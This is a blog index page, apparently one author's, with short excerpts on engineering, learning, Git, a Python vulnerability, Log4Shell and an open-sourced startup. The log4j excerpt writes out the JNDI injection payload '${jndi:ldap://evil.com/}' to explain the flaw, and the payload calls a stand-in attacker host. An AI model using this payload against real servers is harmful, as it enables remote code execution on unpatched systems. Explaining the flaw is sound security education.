Top insights from 150 engineering leaders: challenges, solutions, and learnings
Discover the top challenges faced by engineering leaders in small to big tech companies and learn effective strategies to overcome them.
Adam Goldschmidt
What I learned about self-learning in 15 years
I love teaching myself new subjects. I have been doing it for the past 15 years,
ever since I was 11. Having said that, I am a big believer in frameworks.
Over the years, I have been working on a framework for learning a new subject:
GAMP. Using this framework
You should not use Git as a database
My team inherited a system that stores its data on a file system, constantly being saved to Git, acting as a single source of truth. Is it better or worse than a database? The short answer is, of course, “it depends on your use case”.
How I found (and fixed) a vulnerability in Python
I focused my research on the most popular web frameworks, such as Flask, Bottle, and Tornado. Eventually, I found and fixed a vulnerability in Python.
We should be more prepared when the next Log4Shell arrives
Remember the Equifax breach that happened 4 years ago, caused by an Apache Struts vulnerability (CVE-2017-5638)? I argue that it's quite similar in nature to the new log4j vulnerability, and moreover - it will happen again, in a different project.
TL;DR: log4j vulnerability
log4j implements lookups with JNDI enabled by default: you could have written ${jndi:ldap://evil.com/} and get the server lookup that URL, then load and execute, using JNDI, the Java object that was returned.
No code reviews by default
summary of Raycast's blog "No code reviews by default": At Raycast, we do not require code reviews. Engineers push to the main branch and request reviews when they think it's necessary.
My startup failed, so I open sourced the code
We worked on Dryvo for over a year. We put our hearts and souls into it - and we failed. Instead of letting the code rot in a private repository, we chose to make it public and hope someone finds it useful.